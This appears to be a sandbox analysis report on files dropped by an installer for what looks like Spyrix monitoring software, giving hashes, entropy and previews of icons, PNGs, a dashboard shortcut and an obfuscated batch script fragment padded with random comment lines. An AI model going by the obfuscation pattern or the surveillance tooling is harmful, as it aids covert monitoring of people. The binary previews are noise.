                                                                                                                                                                                                                                                          Preview:rem kezd4t79qxno0lbfeql5y0mu8g6iesyetjcseogfwt472kiwiubb15brfmh2wac96vhv0vnd2020j6zevgvnwwpffvshcpj0zglw700radviz4u8q9aq6k9n..@echo off..rem 000stm4gugwjkgbh428m90yr2..rem ce1k7rdsfo832vwc3jaouwf6whuhamo859077bf249yhqvmg1kd492xy1n0laxcjqawev0lgwfar618zidzyfwk96n90dum9le1hlxjvxajsku4sr3uiuy0..rem dsawc47q7b7rg3lyyyjwoquee0ll0ap5r0099bt1715bh4jezmssc1nm4xfnyr40tu10yayd38i6wla70zmf5096xpoyd018bdbpms0ennjdswzri1jyzqel..setlocal enabledelayedexpansion..rem 2e6crit365pi9pdx3kzzixkz0bxvti57alc..rem tbd2b125fv5tqy0wwb0v1woi0mnrpd6l8..rem 6g5up6bf14gd8ckrvtcxni6x4495olhkrlg706b9nszf6urghw484qcu0hf29s7vhqna1o5uloku3qzxd8591ivyo0idphj1jw9y22y0fjgsjtjodo855g0r..set iniFile=%ProgramData%\%prg_id%\temp\logger.ini..rem rrje26b6rkhrhihlujks437km32ntyjjtcvi63..rem 5qn9uxfpef8xq5039f88vk9umpfl9dj9r7apxc..rem ioq4mok81bx2zs3knaunm2b4mcsjotkyq0rwnmtauk20e7hftlruhy0eoxwbq17088ic70epr0ikd4ns0o03tu98y18pwfn2vxzg4rpi4bn3em187jjj6y1o..set getValue=0..rem 0h5hrq1blurny0ai0ueen0k8mw0cgjlrjajonp24yq2pewj7tdwn9c2e
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):24
                                                                                                                                                                                                                                                          Entropy (8bit):4.084962500721156
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:3:sLvovFN/tQZn:EItK
                                                                                                                                                                                                                                                          MD5:70C758B45D366FDD5BA4F0D0D1088B94
                                                                                                                                                                                                                                                          SHA1:CD0CBB3DF6F011B41B24F8E1CA805469F234F044
                                                                                                                                                                                                                                                          SHA-256:DCF52739862C4FBF4B4C04F470F9F62B46E308E9E5FA87CDFAD1DC66E753DF16
                                                                                                                                                                                                                                                          SHA-512:5AF2BFE2166E3578D3BADA9738CD0C769B2F5A2B9E84B812C7193E3A88163B32B94EB36DE83347A8E7DC75079608102C0CF05293E647132C0F633F67AAECC446
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:timeout 6..dashboard.url
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:MS Windows 95 Internet shortcut text (URL=<"https://dashboard.spyrix.com">), ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):54
                                                                                                                                                                                                                                                          Entropy (8bit):4.722027548259444
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:3:HRAbABGQYmjzPK/tWwMdyTHn:HRYFVmjzPAt0dyTH
                                                                                                                                                                                                                                                          MD5:D1CA0FE113AE79394ECFA5225B06D03A
                                                                                                                                                                                                                                                          SHA1:2EFEB00BC64706B390FA188776A423DD871AE842
                                                                                                                                                                                                                                                          SHA-256:A9A52C2A16DAB18ED9E869CAE2F486327040572461E05FB8F774DC543A82CD45
                                                                                                                                                                                                                                                          SHA-512:BFDE031A1C39770EEAF27F0874B01C99BCA6D3EAB2D55B9FABFD28CAD2EF6D56387510548DFCA3F575D7341B16B05961C00083E19AB33A07A84343B257CB385A
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:[InternetShortcut]..URL="https://dashboard.spyrix.com"
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1150
                                                                                                                                                                                                                                                          Entropy (8bit):5.954587575587282
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:mcyV2d56miiGbKZFG8cZWvl24pZYEYmFMQ05lOo4TTTTTTTTTT3:mcJDbGua8cZOlBUEYA906o4TTTTTTTTX
                                                                                                                                                                                                                                                          MD5:A6AF58DFDF7BCB6AE474DC731AEB0819
                                                                                                                                                                                                                                                          SHA1:353D993129D8C0060BDAFF6B32DACCD1D91F37DE
                                                                                                                                                                                                                                                          SHA-256:62B935FEE25DC4480962834A3AC9B21E285C75FA25EB8BF5288BE4EAEEA8F118
                                                                                                                                                                                                                                                          SHA-512:21259178D3D551E232C63B89DA9F2613F0CB0FF6D4D33A150DDAF6DED6795E277845359ADF228BE2741639838F78DFA56554E0D26A77091BC09361ED18611330
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:............ .h.......(....... ..... ....................................................................~e.....r=/..G8.............................................t@3..........bL..fOb.............lZx.ta..s`..t`..o\..kY..lY..lX..mX.\L>.eP..pX..iRX.........r`D.m..o..m..|g..yg..yg..zf..zd..u_..oZ..v_..rZ..jTZ.........}j\.r...j...m..v..q`..o]..o\..q]..p..v`..pY..t]..lV[..........p[.q....................................rZ..q\[.........s[.u..........................................r[..r][.........x[.w..............se..........q`..............q[..r^[.........}[.x.......................................mX..wc[..........[.~........................................t^..yd[..........[........................................k..}g..ua[..........[.............................i..~i..uaZ..........Z................v..r..u..o..m..n..~i..vcY..........$......................y..w..s..n..k.zg$.............&..Z..W..X..X..X.~X.zX.
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):865
                                                                                                                                                                                                                                                          Entropy (8bit):7.700995430791155
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:gYFXmor3S32jSx6mJYuknx/vNdapyefgQP71YZbHYG:bXm3SwV12x/vPapyCf710bHYG
                                                                                                                                                                                                                                                          MD5:781F31C7BDF09937698ABFE875672A7B
                                                                                                                                                                                                                                                          SHA1:9ED7E05BAB393E6D09DF2C6B8970805F088586B4
                                                                                                                                                                                                                                                          SHA-256:A48944491AD937CA359AE2F8C57070CF69DC58B6F363F8E66B8C2EBE9F8DFB9A
                                                                                                                                                                                                                                                          SHA-512:B7810E56C63EDB096670841C28A70DF441F82741D16439D2CDA39AA3BBB65711379383FE089887DCA8005168F0B7C5B351CF8552DCD6DD4C4FC47D10D9261690
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:.PNG........IHDR................a...(IDATx..ilLQ...}....m*..%..........!.A.5>..H?...^..PK..,.KJ|..B,...Z.h......3..w.u..WN&..{....Y......D.x`..l..a...!D2.(..I..z.z......@).(.K. .K.m..)R'>H..R..7.mX.....XZY...b\...'....-[.p@x.......#.o........G..).4.Pm.p..I......w..fL..d<..t.9.PR.P....fK...4...3.... ..$v.I..hk79...DL..5...(..@..i..p}f/....6..U.c!iq.......9..Q ...(....H.4r..y>.....(X.....Q...b).'....b..a.c.'..E{..L...q.>~L.6....k.a....0.kM0'.......Z.Q..."Z..KA..{..A#:.7.6(..|...U..`e.......l\>...../:xYu....*.....rWW..jA..#..O..!#..ia.8...c...Y..!........eSR..%wtBCF...>kb........f..:.0......M\.m.o..".Qco...E...?|:i.....U._..L.."Q....q.`ILU...)\80=.X..fJ8..M...(..p.6......'...x......*8F......8...R.O.O.RZ(...F.wK@..S.....?k...\a..._>4.<...e#'l .7.53.....Y..jk..8.....3.dK..1.....B..p.9.....*.-.-F.[...2C.n.~../V...$iB....IEND.B`.
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1150
                                                                                                                                                                                                                                                          Entropy (8bit):3.5511716867819327
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:BifyRHHHHHHHHHHHlKDAYHQhY4O4ZYwg7iTT5:wfyHHHHHHHHHHHgDAMQhY4O4ZYwg7iT1
                                                                                                                                                                                                                                                          MD5:F311592151DC7F196CDBC8AF6D426B28
                                                                                                                                                                                                                                                          SHA1:159C11940E4F380F62D56AD12745600EDBEF1E15
                                                                                                                                                                                                                                                          SHA-256:03290429CE68AFD7507C177C9446EFBCC47CFD040DECA70105988D0057919317
                                                                                                                                                                                                                                                          SHA-512:A3259406480C89E73B408DBFDA00B8CBE5F2B168A1C46F6FE73A228B167CDC532FFBB315BD027B130634B8A248F488BD2ADA22CA5A45DF2AD3E728D3FA5DA832
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:............ .h.......(....... ..... ..................................l.(.l...l...m.?.m.`.m.|.k.y.k.].o...............................r.A.q...q...q...q...q...q...q...q...q...o.7.....................u...u...u...u...u...u...u...u...u...u...u...u.o.............y.a.z...z...z...z...z...z...z...z...z...z...z...z...z.^.........~...~...~...~...~...~...~...~...~...~...~...~...~...~.........|..........m.......................3........................|..............x.......9.......'.............................................................................8...................................8.............................................................................'.......9.......x.......................................8.......................m................H...........................................................G..........................................................................................................................................................................
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):524
                                                                                                                                                                                                                                                          Entropy (8bit):7.51499904676362
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:12:6v/725PQZeziVpf6wu0rWQ6Rfcho1S01oS77Qtytds:zJQYgB6wnrWQ6ih0WSQtyns
                                                                                                                                                                                                                                                          MD5:6A3D971DD10943973AD7CFF8776678EE
                                                                                                                                                                                                                                                          SHA1:1FC9EA38435DBA93A64B9E48C7A3CCDED3D92333
                                                                                                                                                                                                                                                          SHA-256:EDB59D1E30DEACB83DCCB9CA2D7F83FC52066CAFC7A8E0A633B9B0DD01CDA360
                                                                                                                                                                                                                                                          SHA-512:B5C8C60578504EDD4EDDF7C5A9CC17BA3D04773CA200D5A8189D22C06BAA9081382F6D3FE076771F385AF7DAC51196AC4BFEFF1852A5E16BBF9AE6D1599FFE0E
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:.PNG........IHDR................a....IDATx..OHTQ...w.p.".DP........$Z$.ZD......FB.A`.`.%r.b.....E.T.....I.h!R..B(*2....o.hP3..y....q.w.u....xH.S^..}'.B......q..nY1K\Q....qW.......D.se......67......,...r.8.[......L..-....n...[....3..K.....N.q.q.f.n.$....k`..DGaf....Z3..<0...u..w%.A.^...Y....p.-.U.t...p...s.E).....:.[T.a.&(..'S......B..B.%u...T=....w..{....{..T........t..^...U.u....pbm.l...G....8.8c..EgT............R..G.w..-t...,......a.....]......t...]2.!....=..7...W.......X.......7.#.....IEND.B`.
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1150
                                                                                                                                                                                                                                                          Entropy (8bit):2.89668669623498
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:12:dDWdAyhFGViosMZNrBK5aTeiVIrSXgXdaguWUl:hxyTGVihMPBK52edrSXgtbUl
                                                                                                                                                                                                                                                          MD5:2102DF54739C5E5FFEDDA31CE18A430E
                                                                                                                                                                                                                                                          SHA1:B62D93ED6661FE4E0080D7CD575D0F81E8640D9B
                                                                                                                                                                                                                                                          SHA-256:2DFDE998FEAC91E72BFDCDDF174000539C525233D4E3EA4744BD08EF70E6C9C0
                                                                                                                                                                                                                                                          SHA-512:654F18D0C0F4309A8C559E4E0CB2D4497AABE9D9D5BDC51EA100CAF0455FC26702E0AA8390B3D7113CD7F752391B9A3283491B5A1623E0060F302EF2A816B7ED
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:............ .h.......(....... ..... ............................"...........................................................".......................................................................................................................................................................................................................@.@.............9.9.............................................................................................................................................................................................................................................................................................................................................................................................................................H.H.........................................I.I.....................^.^.................................^.^.......................................................!.!...........................................................
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):486
                                                                                                                                                                                                                                                          Entropy (8bit):7.403940932243279
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:12:6v/7H2DBCOIXU00QhP+CCTV44lVCcK8ajSR64+eg:C2MXURCCTCXcK8286Heg
                                                                                                                                                                                                                                                          MD5:49CBAB461388899937D45CE5F40FEA6F
                                                                                                                                                                                                                                                          SHA1:4333CFB198B2F8078D38159AE6F37CF2056AC6A9
                                                                                                                                                                                                                                                          SHA-256:30DBAE48834681F6F8E6A6867B5A83582DFBCA8E61C51C8A189687055F1A9042
                                                                                                                                                                                                                                                          SHA-512:5A0C295DC41860B4F650D82B43EFBB4F7369A7DCC6844F8837DA8708F531A4D4C17749152536219492ABAA5667FFC63C0547AB2BD257068CF9BCDD9C47492595
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:.PNG........IHDR................a....IDATx..?K.P...3..?C.qi.T.E...,Up..kgg...b.......A.....8..."h...DDA.1...XJmKz..<...wo.... ....M..V.....o.2Q..e.#<`....E..l.....Y......m#..4...Fb2..D..Q7).K...b.i.....y...9`..^._Gv...a..T.j......1..D[.[...!}`.%....5........k...Y.....!z.u....\2!2....1 .H-.P\I)!......2B.!.[......`+....].F.1....F.I...(/..>}?.....v....w.C6C.H...E..w.v.S.q....?I...a......l<#~.....U....U.^.Q.( ~.G.thG/.....,R.).U.K?9.u.....*...g.*..L_..wt../.....2.....IEND.B`.
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1150
                                                                                                                                                                                                                                                          Entropy (8bit):5.20340524330819
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:12:F5e2nwbQh05puMPaz5NV9/COvwqsvuKMBwnwfqHtJZcaHqtMbHgGomu/HAmlMscR:aCupu0az5l5R4t7bHqkAN/H7WrefjU8W
                                                                                                                                                                                                                                                          MD5:6974D5655CF050D09AEDEFB0A870B09C
                                                                                                                                                                                                                                                          SHA1:2C87D6EFB277163490FFF31C594A5127E8D0B509
                                                                                                                                                                                                                                                          SHA-256:A5761AE112ECB0B8CA16EDD77F9B112D983D7F8B0C229A8099E1A35B2E4F6993
                                                                                                                                                                                                                                                          SHA-512:AA3DBE81C2BFDBDBF4EF81DE63685BEC3743762254476F278E1FC6956A39910E2C4A1E83E491AB579B107FC0496E134AB946800D7D2CA367AE4AF2E109B6741C
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:............ .h.......(....... ..... .............................C.<&D.=SC.?AU.U.....J.@.E.>FC.=XE.=?U.U.........................I.B#B.;.B.;.B.<.C.;.C.;.B.;.B.;.B.;.C.;.C.;.U.U.....................F.>>B.;.B.;.].W................k.f.B.;.C.<.H.A'................F.>BB.;.................~....l.g.t.o.S.M.C.<.U.U.........f.f.C.<..}........a.\.........}............L.E.C.;.........D.;VB.;........n.i.............................C.;.U.U.....B.<.].W....._.Y.....~.z.B.;.B.;.J.D...............B.;.E.=?....C.<.j.e.....E.>.....P.I.B.;.B.;.B.;.......x.s.....B.;.C.=X....C.<.g.b.....O.H.....u.p.B.;.B.;.D.=...............B.;.E.>J....D.<|D.>..................|.w..................B.;.I.@.....E.>%C.;........T.N...............}.x........e._.B.;.............B.<{G.A.........z.u.D.>.B.;.X.R...........C.;.G.@$............U.U.B.<.G.@..........................}.C.;.B.=d....................U.U.B.<{C.;.F.?.l.f.t.o.c.].B.;.B.;.E.=;................................G.@$D.<|C.<.C.<.C.;.D.
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):838
                                                                                                                                                                                                                                                          Entropy (8bit):7.7197016545374275
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:12:6v/7Mx+Nre92kjEfcc8YhUaUuYE67bCIUMn+VnMUHAqOIjaDD/yJgQGToLYZFN:Z+LqERhUO67bCIZfmAajkj3tyYjN
                                                                                                                                                                                                                                                          MD5:D9F77B09484FECF86DAB1E27B61481C3
                                                                                                                                                                                                                                                          SHA1:D514C22AC2A1AC4B0826E38C48BABD9CBB077F9F
                                                                                                                                                                                                                                                          SHA-256:CBFBDC4F27D2DE65E5F38B4233C967F1781449DE939BDF7451F2548511CF8F95
                                                                                                                                                                                                                                                          SHA-512:606E0E9800296568C06F6015BB6DF091D5B75E516056032FB28CA1508E67AA0E8BBAC978981CA9FF492F54A7CFE02DF233042442F707588E6E8CFD82C7F8B93C
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:.PNG........IHDR................a....IDATx..kHSa......t.4..kj...I0)l.y...ZF.Fe.D.%K.K.....FVH..A.Y..Z..E. .".L..sz.,.|.}.....wx...O....>... |.x(x.;!..;S..n..' ...o;.y.TJ!.E)"!.xbh...^..V......,....vG....%.E...7......o]v.l.a..1<_jN24L.hL..,..5q..a.q.V..C.p...=fcup..B.........X^..t.*.....Z.lSX.le@.J..\..kh.B...a.].}(eJl....=e.~..,:C....Sw1..//...W. cd(.[...g0<>....hT.8n.C.<D.i..}`.1...=E.9s~.)u-2............c.m..G.pN..(...:.!a$Y?.W...rN,.A.9...u.X.0292.....Q'.7..T".M...|..*.#....".2z'.i.i...,X....+TT7..S..k+..D'...R..q....p....n.`..\..btr..T......D.M...Op.vr,H.T..-.../Fm..T..{....*XG.X...o..qOt`GD..}~....0..Ytm.S{.5.Hvs.mE..yn...=.uC.N....;..O:.....i..R......R.Ix......../..o...x>........7jZ..61.1....6..#..<H. .x...."..H..r...iY.S".Ob.......:cf..L,.9NI...Hgu.........4..`......IEND.B`.
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1150
                                                                                                                                                                                                                                                          Entropy (8bit):3.5511716867819327
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:BifyRHHHHHHHHHHHlKDAYHQhY4O4ZYwg7iTT5:wfyHHHHHHHHHHHgDAMQhY4O4ZYwg7iT1
                                                                                                                                                                                                                                                          MD5:F311592151DC7F196CDBC8AF6D426B28
                                                                                                                                                                                                                                                          SHA1:159C11940E4F380F62D56AD12745600EDBEF1E15
                                                                                                                                                                                                                                                          SHA-256:03290429CE68AFD7507C177C9446EFBCC47CFD040DECA70105988D0057919317
                                                                                                                                                                                                                                                          SHA-512:A3259406480C89E73B408DBFDA00B8CBE5F2B168A1C46F6FE73A228B167CDC532FFBB315BD027B130634B8A248F488BD2ADA22CA5A45DF2AD3E728D3FA5DA832
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:............ .h.......(....... ..... ..................................l.(.l...l...m.?.m.`.m.|.k.y.k.].o...............................r.A.q...q...q...q...q...q...q...q...q...o.7.....................u...u...u...u...u...u...u...u...u...u...u...u.o.............y.a.z...z...z...z...z...z...z...z...z...z...z...z...z.^.........~...~...~...~...~...~...~...~...~...~...~...~...~...~.........|..........m.......................3........................|..............x.......9.......'.............................................................................8...................................8.............................................................................'.......9.......x.......................................8.......................m................H...........................................................G..........................................................................................................................................................................
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):524
                                                                                                                                                                                                                                                          Entropy (8bit):7.51499904676362
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:12:6v/725PQZeziVpf6wu0rWQ6Rfcho1S01oS77Qtytds:zJQYgB6wnrWQ6ih0WSQtyns
                                                                                                                                                                                                                                                          MD5:6A3D971DD10943973AD7CFF8776678EE
                                                                                                                                                                                                                                                          SHA1:1FC9EA38435DBA93A64B9E48C7A3CCDED3D92333
                                                                                                                                                                                                                                                          SHA-256:EDB59D1E30DEACB83DCCB9CA2D7F83FC52066CAFC7A8E0A633B9B0DD01CDA360
                                                                                                                                                                                                                                                          SHA-512:B5C8C60578504EDD4EDDF7C5A9CC17BA3D04773CA200D5A8189D22C06BAA9081382F6D3FE076771F385AF7DAC51196AC4BFEFF1852A5E16BBF9AE6D1599FFE0E
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:.PNG........IHDR................a....IDATx..OHTQ...w.p.".DP........$Z$.ZD......FB.A`.`.%r.b.....E.T.....I.h!R..B(*2....o.hP3..y....q.w.u....xH.S^..}'.B......q..nY1K\Q....qW.......D.se......67......,...r.8.[......L..-....n...[....3..K.....N.q.q.f.n.$....k`..DGaf....Z3..<0...u..w%.A.^...Y....p.-.U.t...p...s.E).....:.[T.a.&(..'S......B..B.%u...T=....w..{....{..T........t..^...U.u....pbm.l...G....8.8c..EgT............R..G.w..-t...,......a.....]......t...]2.!....=..7...W.......X.......7.#.....IEND.B`.
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1150
                                                                                                                                                                                                                                                          Entropy (8bit):3.8378245167837792
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:6:ttl7t4rfiKKc1XgZUZUZUZUZUZUJXm5ZUZUZUZUZUZUZUZUzC25ZUZUZUyUZUZUg:vlJcP+mpC2KC2KC2KC2KC2Kno9gH9Pcn
                                                                                                                                                                                                                                                          MD5:9647EA4E877FE5A0A08E611D46767EBD
                                                                                                                                                                                                                                                          SHA1:B64CB43619FF5F96F26C0FEFD03CB96373E1E0D9
                                                                                                                                                                                                                                                          SHA-256:DB32B69F2877535C81DFD48ACCA5251BCEED320C1E8A03135F8C80C11D6F248A
                                                                                                                                                                                                                                                          SHA-512:ED6CDB303CBEF7378C1EE1EBF22F9EACF59D354F3157766E486F2A8CEB5E30F11B11F0D289B254F83197F07208C7DF3A14E9EBA3680E38D6CCE6D4AD791F3DCE
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:............ .h.......(....... ..... ..............................................{ .{..{..{..{..{..{ .................................{ .{..{..{..{..{..{..{..{ ............................i:7.i:7.i:7.i:7.i:7.i:7.._Y..{..zr..YP..YP......SK.SK..SK..SK..SK..SK..SK..SK..SK..QJ.i:7..{..{..YP..YP..YP..SK..SK..SK..SK..SK..SK..SK..SK..SK..SK.i:7..{..{..YP..YP..YP..SK..SK..SK..SK..SK......SK..SK..SK..SK.i:7..{..{..YP..YP..YP..SK..SK..SK..SK..SK......SK..SK..SK..SK.i:7..{..{..YP..YP..YP..SK..SK..SK..SK..SK......SK..SK..SK..SK.i:7..{..{..YP..YP..YP..SK..SK..SK..SK..SK......SK..SK..SK..SK.i:7..{..{..YP..YP..YP..SK..SK..SK..SK..SK......SK..SK..SK..SK.i:7..{..x..YP..YP..YP.SK..SK..SK......................SK..SK.i:7..{..................SK..SK..SK..SK..SK..SK..SK..SK..SK..SK.q?;..{..YP..YP..YP..YP..SK.SK..SK..SK..SK..SK..SK..SK..SK..VN..{..{..YP..YP..YP..YP..........................{..{..{..{..{..{..^U..YP..YP..YP..........................{..{..{..{..
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):306
                                                                                                                                                                                                                                                          Entropy (8bit):6.791105413587409
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:6:6v/lhPt+HkIXaZ6t6p1+yMqZZQZX08sIfahdKry9Ral0GykkCmgpF6PF2fp:6v/7PIXaZuC+y5Qe8T+NA0lk9pw2x
                                                                                                                                                                                                                                                          MD5:B61B5003FBBE118F371C4AD42F4EF520
                                                                                                                                                                                                                                                          SHA1:CA09B93D1185476243A5A6C91F72DE328E291F1B
                                                                                                                                                                                                                                                          SHA-256:A5535A95335D1898EE2496AA99725F4BD62B229A1AF776F6B237CAA553AF539F
                                                                                                                                                                                                                                                          SHA-512:D3CF0B4E5B2CEA3ECF3C88460B8D566F01C0F50F597D1ABFD0D5D42B0EBB749435BF89976BCCE1B89C19E22D1EBE574FA2DA93DA7D568B0B8D8CBAB0C7281191
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:.PNG........IHDR................a....IDATx.cd...._....@...:........1.1`?.f.8p...@...o.g..l.n?b........{..i..<....AWW.....E.d..."..7[..\.0..l..5...}B...7...p.l..Dl.......@....0........p..l.z8.W...|..LH...fx.r.6.&`$es.LP..@.WRudPRqd....{................:..U.Dd.LL..^..d.!.h.....A.....n>7......IEND.B`.
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1150
                                                                                                                                                                                                                                                          Entropy (8bit):5.949963945175186
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:PE14x6qLv19cI/PRw1ZoPh+tV/HFm+TIe0WmY:s1ALtDtPh+tVvz0WB
                                                                                                                                                                                                                                                          MD5:E929E2F2B14B9EC2EC42A663F3C7EEC2
                                                                                                                                                                                                                                                          SHA1:2E66730E02EEDA9641153D48F408CECFB72E92F6
                                                                                                                                                                                                                                                          SHA-256:A6DB330F99F450E9BBA286E6FE96B13DD8DA5079A7A1F8E191A09123C6A61906
                                                                                                                                                                                                                                                          SHA-512:5AFBE7ABB77DA9F37D5E0392BE622C8AC8BA0C07F02430E5F5FEC624074F12ABA39BEFF2AA4D44CD3029886A8B71BE7AEAE9F6AED8A95D83369984EC39CF066C
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
